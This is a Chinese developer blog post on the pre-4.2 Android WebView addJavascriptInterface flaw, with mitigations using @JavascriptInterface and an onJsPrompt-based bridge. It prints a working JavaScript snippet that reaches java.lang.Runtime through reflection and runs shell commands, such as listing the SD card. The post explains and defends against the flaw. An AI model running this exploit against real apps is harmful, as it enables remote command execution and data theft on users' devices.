WebView JS安全问题

最新推荐文章于 2024-01-16 15:28:31 发布
最新推荐文章于 2024-01-16 15:28:31 发布
阅读量1k 收藏 2
点赞数
分类专栏: Android 文章标签: JavascriptInterface onJsPrompt webview 安全 js
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Love_5209/article/details/43759033
版权

通常我们都可以使用JS调用java的代码,但在android4.2之前这存在着安全隐患,JS可以通过注入的方式调用java的函数。

这里看一下乌云漏洞的一个例子:点击打开链接


1,WebView添加了JavaScript对象,并且当前应用具有读写SDCard的权限,也就是:android.permission.WRITE_EXTERNAL_STORAGE
2,JS中可以遍历window对象,找到存在“getClass”方法的对象的对象,然后再通过反射的机制,得到Runtime对象,然后调用静态方法来执行一些命令,比如访问文件的命令.
3,再从执行命令后返回的输入流中得到字符串,就可以得到文件名的信息了。然后想干什么就干什么,好危险。核心JS代码如下: 
function execute(cmdArgs)
{
    for (var obj in window) {
        if ("getClass" in window[obj]) {
            alert(obj);
            return  window[obj].getClass().forName("java.lang.Runtime")
                 .getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);
        }
    }
} 

它遍历所有window的对象,然后找到包含getClass方法的对象,利用这个对象的类,找到java.lang.Runtime对象,然后调用“getRuntime”静态方法方法得到Runtime的实例,再调用exec()方法来执行某段命令。
如:var p = execute(["ls","/mnt/sdcard/"]);

解决方法:
android4.2之后提出了@JavascriptInterface   JS只能访问带有@JavascriptInterface的方法。如果您的应用android:targetSdkVersion数值为17或者大于17记得添加 @JavascriptInterface 注解

对于4.2以下的版本, 首先,我们肯定不能再调用addJavascriptInterface方法了。关于这个问题,最核心的就是要知道JS事件这一个动作,JS与Java进行交互我们知道,有以下几种,比prompt, alert等,这样的动作都会对应到 WebChromeClient 类中相应的方法,对于prompt,它对应的方法是 onJsPrompt 方法 
public boolean onJsPrompt(WebView view, String url, String message, 
    String defaultValue, JsPromptResult result)
通过这个方法,JS能把信息(文本)传递到Java,而Java也能把信息(文本)传递到JS中

【1】让JS调用一个Javascript方法,这个方法中是调用prompt方法,通过prompt把JS中的信息传递过来,这些信息应该是我们组合成的一段有意义的文本,可能包含: 特定标识,方法名称,参数等。在 onJsPrompt方法中,我们去解析传递过来的文本,得到方法名,参数等,再通过反射机制,调用指定的方法,从而调用到Java对象的方法。
【2】关于返回值,可以通过prompt返回回去,这样就可以把Java中方法的处理结果返回到Js中。
【3】我们需要动态生成一段声明Javascript方法的JS脚本,通过loadUrl来加载它,从而注册到html页面中 
javascript:(function JsAddJavascriptInterface_(){
    if (typeof(window.jsInterface)!='undefined') {    
        console.log('window.jsInterface_js_interface_name is exist!!');} 
    else {
        window.jsInterface = {        
            onButtonClick:function(arg0) { 
                return prompt('MyApp:'+JSON.stringify({obj:'jsInterface',func:'onButtonClick',args:[arg0]}));
            },
            
            onImageClick:function(arg0,arg1,arg2) { 
                prompt('MyApp:'+JSON.stringify({obj:'jsInterface',func:'onImageClick',args:[arg0,arg1,arg2]}));
            },
        };
    }
}
)()

说明:
1,上面代码中的 jsInterface就是要注册的对象名,它注册了两个方法, onButtonClick(arg0)和onImageClick(arg0, arg1, arg2),如果有返回值,就添加上return。
2,prompt中是我们约定的字符串,它包含特定的标识符 MyApp:,后面包含了一串JSON字符串,它包含了 方法名,参数,对象名等。
3,当JS调用onButtonClick或onImageClick时,就会回调到Java层中的 onJsPrompt方法,我们再解析出方法名,参数,对象名,再反射调用方法。
4,window.jsInterface这表示在window上声明了一个Js对象,声明方法的形式是: 方法名:function(参数1,参数2) 


文章参考:http://blog.csdn.net/leehong2005/article/details/11808557
http://blog.csdn.net/leehong2005/article/details/11808557

小酷
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
electron 提供SDK接口注入到远端页面使用
qbian的博客
02-24 7720
一、加载远端页面在main.js内通过 BrowserWindow 对象加载远端页面,如下所示:'use strict';const electron = require('electron') const globalShortcut = electron.globalShortcut; // Module to control application life. const app = elec
Electron为网页注入js预加载
fukami666的博客
03-24 6869
Electron为网页注入js预加载准备工作main.jspreload.jspackage.json遇到的问题下一步的方向 准备工作 首先我下载了一个 electron-quick-start 并安装 node.js 找到一个网页,我选择的是一个快速制作插画的网站 Picrew main.js 在main.js里可以修改弹窗的各种属性,我们需要的是 function createWindow () { const mainWindow = new BrowserWindow({ webPref
Android webView安全漏洞解决
10-13
Android webView安全漏洞解决 1. 解决CVE(通用漏洞与披露)中记录WebView的4个漏洞 2.解决 WebView File域同源策略绕过漏洞 3.解决 WebView 密码存储漏洞
electron的webView通信和如何在Electron中使用webView打开网页并获取DOM元素
qq_44984407的博客
02-23 3586
electron的webView通信
electron中使用webview
qq_43447509的博客
02-15 3547
使用webview标签 <webview src="https://www.baidu.com" preload="./preload.js"></webview> 向webview注入JS // preload.js const { contextBridge } = require('electron') contextBridge.exposeInMainWorld('apiKey', { fn: () => {} }) // 在webview页面使用 wind
WebViewJs交互
04-10
当需要在Android应用中与网页进行交互时,WebView与JavaScript的交互机制就显得尤为重要。下面将详细阐述这一主题。 一、WebView的介绍 WebView是Android SDK中的一个类,它继承自View,主要用于在Android应用中...
Android_WebView安全攻防指南2020.pdf
08-11
然而,WebView也成为了安全问题的重灾区,因为它可能被攻击者利用来实施各种攻击。以下是一份详细的Android WebView安全攻防指南,涵盖了WebView的攻击面、配置与使用、URL校验以及安全防御措施。 1. **WebView攻击...
iOS原生与WebView JS交互
07-09
其中,WKWebView是苹果推荐的新一代WebView,它提供了更好的性能和安全性,同时支持最新的Web标准。而UIWebView则相对老旧,但在某些场景下仍然有其使用价值。 二、Swift中的WebView集成 1. WKWebView集成: - ...
webview中java与js安全交互
04-08
以上就是关于"WebView中Java与JavaScript安全交互"的一些关键知识点。通过理解并应用这些技巧,开发者可以构建更安全、更可靠的混合式应用程序。在实际开发中,应根据项目的具体需求和安全级别,选择合适的策略进行...
Android笔记webviewjs交互
10-26
在使用`addJavascriptInterface`时,需要注意JavaScript代码可能对Android应用造成安全风险,因为JavaScript可以直接调用对象的公共方法。因此,我们应该只暴露不包含敏感操作的方法,并确保所有方法都加上`@...
electron私有部署webview加载不安全的https网址
前进者
01-14 6651
起因: 目前我们electron项目需要部署到指定私有的局域网下,webview的src写地址的形式实现的,局域网的ip搞了一个私有https证书, 为了打开本地摄像头,但是私有的https证书是不安全的,webview的src添加进去加载不出网页 解决思路: 思路一:electron忽略证书相关的错误. 思路二: electron实现信任这个网址 方案1: 如图指定位置添加一句代码...
electron中实现通过webview实现内嵌网页并嵌入css样式和js脚本等
weixin_46918498的博客
10-22 1703
<webview id="geekori" src="https://baidu.com" style="width:400px; height:300px" ></webview> 参考:https://www.cnblogs.com/badaoliumangqizhi/p/12995335.html
Electron使用preload预加载及安全策略
qq_30386941的博客
10-27 9018
使用 Electron 很重要的一点是要理解 Electron 不是一个 Web 浏览器。它允许您使用熟悉的 Web 技术构建功能丰富的桌面应用程序,但是您的代码具有更强大的功能。JavaScript 可以访问文件系统,用户 shell 等。这允许您构建更高质量的本机应用程序,但是内在的安全风险会随着授予您的代码的额外权力而增加。
Electron中脚本注入实践
zhangzheng1991的博客
11-04 6374
前言 Electron基于Chromium所以可以像浏览器一样加载任何第三方网页,并且其可以对网页注入脚本,将JavaScript代码注入到目标网页中并执行就像网页开发者自己开发的一样。脚本注入后可以访问该页面内的任何内容,包括网页的样式、服务端接口、Cookie等,并且你注入的脚本还可以通过Node.js访问系统资源,例如可以将网页中获取的资源直接保存到本地磁盘中。 脚本注入实践 1.通过preload文件注入脚本 首先使用Vue CLI Plugin Electron Builder创建Elec
electron 样式不加载_Electron中实现通过webview实现内嵌网页并嵌入css样式和js脚本等...
weixin_35529208的博客
12-24 1644
场景用HTML和CSS和JS构建跨平台桌面应用程序的开源库Electron的介绍以及搭建HelloWorld:Electron怎样进行渲染进程调试和使用浏览器和VSCode进行调试:在上面搭建好项目以及知道怎样进行调试后如果要想将某些web网页内嵌进来,类似于iframe的效果。注:实现显示webview首先在html中添加webview标签直接通过src属性设置要内嵌的网页的地址。然后打开mai...
android web安全问题,Android WebView常见的安全漏洞和解决方案
weixin_29184371的博客
05-26 898
概述WebView安全漏洞有三种,分别是:远程代码执行漏洞密码明文存储漏洞域控制不严格漏洞下面依次分析各漏洞产生的原因以及解决方案一、远程代码执行漏洞1、WbView中addJavascriptInterface()接口产生原因:Android API level 17以及之前的系统版本,由于程序没有正确限制使用addJavascriptInterface方法,远程攻击者可通过使用Java Re...
第六节 Electron安全策略
08-19 1024
Content Security Policy 简称 CSP 是一种网页安全政策CSP 的实质就是白名单制度,开发者明确告诉客户端,哪些外部资源可以加载和执行,等同于提供白名单。它的实现和执行全部由浏览器完成,开发者只需提供配置。CSP 大大增强了网页的安全性。攻击者即使发现了漏洞,也没法注入脚本,除非还控制了一台列入了白名单的可信主机。通俗的讲开启 CSP 后可以让浏览器自动禁止外部注入恶意脚本,增加网站的安全性能。
Android WebView安全方面的一些坑
最新发布
yy1715713348的博客
01-16 1032
公司一款app有将近两年没有更新了,虽然用户量不大,但是因为与第三方有合作,出现问题时需要进行维护;没想到最近第三方对他们所有的软件进行了网络安全扫描,这款也未能幸免…因为app是13年左右开发的,维护也只是到16、17年左右就终止了,所以,扫描出不少漏洞;因为是采用了混合开发,因此,需要解决一些webview
electron webview通信
独行侠的博客
05-16 7123
1、在webview标签所在的html页面,代码如下:2、在被webview加载的页面,代码如下:3、在webview标签所在的html页面的控制台输出:4、在被webview加载的页面的控制台输出:...
深度解析Android WebView:定制与安全实践
例如,当WebView关闭或隐藏时,页面加载进度变化,JavaScript弹出的确认框和警告框,以及js操作可能导致的超时等。通过自定义WebChromeClient,开发者可以对这些事件做出相应的响应,提供更丰富的用户体验。 2. ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值